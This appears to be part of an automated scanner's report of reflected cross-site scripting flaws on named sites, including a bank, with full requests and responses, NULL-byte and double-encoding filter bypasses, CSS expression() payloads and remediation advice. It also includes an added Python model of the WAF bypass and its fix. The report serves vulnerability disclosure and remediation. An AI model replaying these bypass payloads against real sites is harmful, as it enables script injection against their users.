GET /bbt/careers/?%0012a7a"><script>alert(1)</script>5fb5315ccee=1 HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response
HTTP/1.1 200 OK connection: close content-type: text/html date: Thu, 03 Feb 2011 14:11:51 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 33957 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
1.446. http://www.bbt.com/bbt/mobile/mobile-product.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.bbt.com
Path:
/bbt/mobile/mobile-product.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00f9529"><script>alert(1)</script>45d303da152 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f9529"><script>alert(1)</script>45d303da152 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /bbt/mobile/mobile-product.html?%00f9529"><script>alert(1)</script>45d303da152=1 HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response
HTTP/1.1 200 OK connection: close content-type: text/html date: Thu, 03 Feb 2011 13:48:30 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 30271 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
1.447. http://www.bbt.com/bbt/personal/products/checkcard/default.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.bbt.com
Path:
/bbt/personal/products/checkcard/default.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0055e59"><script>alert(1)</script>759ab4bcd91 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 55e59"><script>alert(1)</script>759ab4bcd91 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /bbt/personal/products/checkcard/default.html?%0055e59"><script>alert(1)</script>759ab4bcd91=1 HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response
HTTP/1.1 200 OK connection: close content-type: text/html date: Thu, 03 Feb 2011 13:48:33 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 31030 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
1.448. http://www.bbt.com/bbt/personal/products/onlinebanking/default.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.bbt.com
Path:
/bbt/personal/products/onlinebanking/default.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %006f039"><script>alert(1)</script>d7e45a2b9d5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6f039"><script>alert(1)</script>d7e45a2b9d5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /bbt/personal/products/onlinebanking/default.html?%006f039"><script>alert(1)</script>d7e45a2b9d5=1 HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response
HTTP/1.1 200 OK connection: close content-type: text/html date: Thu, 03 Feb 2011 13:48:39 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 35938 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
1.449. http://www.bbt.com/bbt/sitemap.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.bbt.com
Path:
/bbt/sitemap.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %009f75f"><script>alert(1)</script>ddf7c1767f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9f75f"><script>alert(1)</script>ddf7c1767f3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is defended by a web application firewall (WAF) written in native code, where C-style strings end at the first NULL byte: the WAF inspects only the bytes before the %00 and never sees the blocked characters, while the application behind it (ASP.NET, according to the response headers) holds the parameter as a length-delimited string, keeps the characters after the NULL and echoes them. You should fix the actual vulnerability within the application code by HTML-encoding the value at the point where it is written into the attribute, and, if appropriate, ask your WAF vendor to provide a fix for the NULL byte bypass. Do not rely on the WAF as the only control.
Request
GET /bbt/sitemap.html?%009f75f"><script>alert(1)</script>ddf7c1767f3=1 HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response
HTTP/1.1 200 OK
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 14:11:59 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 32253
cache-control: private
x-powered-by: ASP.NET

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
1.450. https://www.bbt.com/images/chat/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: https://www.bbt.com
Path: /images/chat/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00a1daf"><script>alert(1)</script>1641a099e6e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a1daf"><script>alert(1)</script>1641a099e6e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is defended by a web application firewall (WAF) written in native code, where C-style strings end at the first NULL byte: the WAF inspects only the bytes before the %00 and never sees the blocked characters, while the application behind it (ASP.NET, according to the response headers) holds the parameter as a length-delimited string, keeps the characters after the NULL and echoes them. You should fix the actual vulnerability within the application code by HTML-encoding the value at the point where it is written into the attribute, and, if appropriate, ask your WAF vendor to provide a fix for the NULL byte bypass. Do not rely on the WAF as the only control.
Request
GET /images/chat/?%00a1daf"><script>alert(1)</script>1641a099e6e=1 HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response
HTTP/1.1 200 OK
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 13:48:33 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 207
cache-control: private
x-powered-by: ASP.NET
Via: 1.1 www.bbt.com (Alteon iSD-SSL/5.1.7)
1.451. https://www.bbt.com/images/chat/oao-matrix/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: https://www.bbt.com
Path: /images/chat/oao-matrix/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00de7c6"><script>alert(1)</script>3830aed06ac was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as de7c6"><script>alert(1)</script>3830aed06ac in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is defended by a web application firewall (WAF) written in native code, where C-style strings end at the first NULL byte: the WAF inspects only the bytes before the %00 and never sees the blocked characters, while the application behind it (ASP.NET, according to the response headers) holds the parameter as a length-delimited string, keeps the characters after the NULL and echoes them. You should fix the actual vulnerability within the application code by HTML-encoding the value at the point where it is written into the attribute, and, if appropriate, ask your WAF vendor to provide a fix for the NULL byte bypass. Do not rely on the WAF as the only control.
Request
GET /images/chat/oao-matrix/?%00de7c6"><script>alert(1)</script>3830aed06ac=1 HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response
HTTP/1.1 200 OK
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 13:48:34 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 218
cache-control: private
x-powered-by: ASP.NET
Via: 1.1 www.bbt.com (Alteon iSD-SSL/5.1.7)
1.452. https://www.bbt.com/images/chat/oao/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: https://www.bbt.com
Path: /images/chat/oao/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00fd8c7"><script>alert(1)</script>c4970a877ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fd8c7"><script>alert(1)</script>c4970a877ed in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is defended by a web application firewall (WAF) written in native code, where C-style strings end at the first NULL byte: the WAF inspects only the bytes before the %00 and never sees the blocked characters, while the application behind it (ASP.NET, according to the response headers) holds the parameter as a length-delimited string, keeps the characters after the NULL and echoes them. You should fix the actual vulnerability within the application code by HTML-encoding the value at the point where it is written into the attribute, and, if appropriate, ask your WAF vendor to provide a fix for the NULL byte bypass. Do not rely on the WAF as the only control.
Request
GET /images/chat/oao/?%00fd8c7"><script>alert(1)</script>c4970a877ed=1 HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response
HTTP/1.1 200 OK
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 13:48:35 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 211
cache-control: private
x-powered-by: ASP.NET
Via: 1.1 www.bbt.com (Alteon iSD-SSL/5.1.7)
1.453. https://www.bbt.com/images/chat/vcsp/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: https://www.bbt.com
Path: /images/chat/vcsp/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00ae575"><script>alert(1)</script>447eca9d97b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ae575"><script>alert(1)</script>447eca9d97b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is defended by a web application firewall (WAF) written in native code, where C-style strings end at the first NULL byte: the WAF inspects only the bytes before the %00 and never sees the blocked characters, while the application behind it (ASP.NET, according to the response headers) holds the parameter as a length-delimited string, keeps the characters after the NULL and echoes them. You should fix the actual vulnerability within the application code by HTML-encoding the value at the point where it is written into the attribute, and, if appropriate, ask your WAF vendor to provide a fix for the NULL byte bypass. Do not rely on the WAF as the only control.
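As an added illustration, not part of the scanner output, the following Python models why the %00 bypass reported in findings 1.448 to 1.453 defeats a native-code WAF but not the application behind it, and shows the application-side fix the remediation notes call for. The blacklist signatures, the attribute markup and the assumption that the application simply drops the NUL are constructed for this example; only the payload and marker are taken from finding 1.449.

```python
from html import escape
from urllib.parse import unquote_to_bytes

# Blacklist signatures for the modelled WAF (constructed for this example).
SIGNATURES = (b"<script", b"javascript:", b"onerror=", b"onload=")


def first_param_name(raw_query: bytes) -> bytes:
    """URL-decode the name of the first query-string parameter."""
    first_pair = raw_query.split(b"&", 1)[0]
    return unquote_to_bytes(first_pair.split(b"=", 1)[0])


def native_waf_blocks(raw_query: bytes) -> bool:
    """Models a WAF written in C: the decoded name is copied into a char buffer and
    searched with strstr()/strcasestr(), which stop at the first NUL byte. Anything
    after %00 is therefore invisible to the filter."""
    visible = first_param_name(raw_query).split(b"\x00", 1)[0]
    return any(sig in visible.lower() for sig in SIGNATURES)


def length_aware_waf_blocks(raw_query: bytes) -> bool:
    """The WAF-side fix: scan the whole length-delimited buffer (memmem-style)."""
    name = first_param_name(raw_query).lower()
    return any(sig in name for sig in SIGNATURES)


def strip_nul(name: bytes) -> str:
    # The report shows the NUL absent from the echo; dropping it here is an
    # assumption about the application. Everything after it is kept, as reported.
    return name.replace(b"\x00", b"").decode("latin-1")


def app_echo_vulnerable(raw_query: bytes) -> str:
    """Models the reported page (assumed markup): the parameter name is written
    unencoded into a double-quoted attribute value."""
    return f'<a href="/bbt/sitemap.html?{strip_nul(first_param_name(raw_query))}=1">'


def app_echo_fixed(raw_query: bytes) -> str:
    """Application-side fix: HTML-attribute-encode at the point of output. This
    holds whether or not a WAF sits in front of the application."""
    safe = escape(strip_nul(first_param_name(raw_query)), quote=True)
    return f'<a href="/bbt/sitemap.html?{safe}=1">'


def breaks_out_of_attribute(html_out: str, marker: str) -> bool:
    """True if the injected text closed the attribute and a live <script> element
    followed by the scanner's marker appears in the output."""
    return f'"><script>alert(1)</script>{marker}' in html_out


# Payload from finding 1.449, as sent (the scanner sends quotes and brackets raw).
PAYLOAD_WITH_NUL = b'%009f75f"><script>alert(1)</script>ddf7c1767f3=1'
PAYLOAD_WITHOUT_NUL = b'9f75f"><script>alert(1)</script>ddf7c1767f3=1'
MARKER = "ddf7c1767f3"


if __name__ == "__main__":
    for label, q in (("no NUL", PAYLOAD_WITHOUT_NUL), ("with %00", PAYLOAD_WITH_NUL)):
        print(label,
              "native WAF blocks:", native_waf_blocks(q),
              "length-aware WAF blocks:", length_aware_waf_blocks(q),
              "vulnerable app exploitable:", breaks_out_of_attribute(app_echo_vulnerable(q), MARKER),
              "fixed app exploitable:", breaks_out_of_attribute(app_echo_fixed(q), MARKER))
```

Run stand-alone it prints one line per payload: without the NUL the blacklist catches the script tag; with %00 the native-style scan sees an empty string and lets the request through, the unencoded page still renders the script element, and the output-encoded page does not.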
Request
GET /images/chat/vcsp/?%00ae575"><script>alert(1)</script>447eca9d97b=1 HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response
HTTP/1.1 200 OK
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 13:48:39 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 212
cache-control: private
x-powered-by: ASP.NET
Via: 1.1 www.bbt.com (Alteon iSD-SSL/5.1.7)
1.454. http://www.brothercake.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.brothercake.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 350fe"><script>alert(1)</script>79cd7322848 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 350fe\"><script>alert(1)</script>79cd7322848 in the application's response. The backslash in front of the quote shows that the application applies addslashes-style escaping (the response sets a PHPSESSID cookie, so this is likely PHP's magic_quotes or an equivalent). That escaping is meant for string literals, not HTML: a backslash has no meaning inside an HTML attribute, so the double quote still terminates the attribute value and the injected script element is rendered.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?350fe"><script>alert(1)</script>79cd7322848=1 HTTP/1.1
Host: www.brothercake.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:22:32 GMT
Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Cache-control: private
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Set-Cookie: PHPSESSID=3f722a0b27bbf1e02a7a38b563ec2988; path=/
Connection: close
Content-Type: text/html
Content-Length: 20228

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of the cat request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 629be%2527%253balert%25281%2529%252f%252f3d8ca4cb923 was submitted in the cat parameter. This input was echoed as 629be';alert(1)//3d8ca4cb923 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the cat request parameter, as the web server will already have carried out one decode; the second decode is what turns the %27 and %3b that passed the filter back into a quote and a semicolon. In any case, the application should perform its input validation after any custom canonicalisation has been carried out, and, if the value must be placed in a script block, escape it for a JavaScript string literal at the point of output rather than relying on a character blacklist.
Request
GET /dart/?ag=True&css=banner&p=locm.sp&pos=1&t=1&sz=728x90&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services629be%2527%253balert%25281%2529%252f%252f3d8ca4cb923&zone=locm.sp%2fretail_banks_15020100 HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323183777121350
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 1062
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:25:15 GMT
Connection: close
Content-Length: 1062
The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14aca%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee268f1e14c1 was submitted in the cat parameter. This input was echoed as 14aca"><script>alert(1)</script>e268f1e14c1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the cat request parameter, as the web server will already have carried out one decode; the second decode is what turns the %22, %3e and %3c that passed the filter back into a quote and angle brackets. In any case, the application should perform its input validation after any custom canonicalisation has been carried out, and should HTML-encode the value at the point where it is written into the attribute rather than relying on a character blacklist.
Request
GET /dart/?ag=True&css=banner&p=locm.sp&pos=1&t=1&sz=728x90&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services14aca%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee268f1e14c1&zone=locm.sp%2fretail_banks_15020100 HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323183777121350
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 1107
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:25:15 GMT
Connection: close
Content-Length: 1107
The value of the css request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36ffb"style%3d"x%3aexpression(alert(1))"4094d82a023 was submitted in the css parameter. This input was echoed as 36ffb"style="x:expression(alert(1))"4094d82a023 in the application's response.
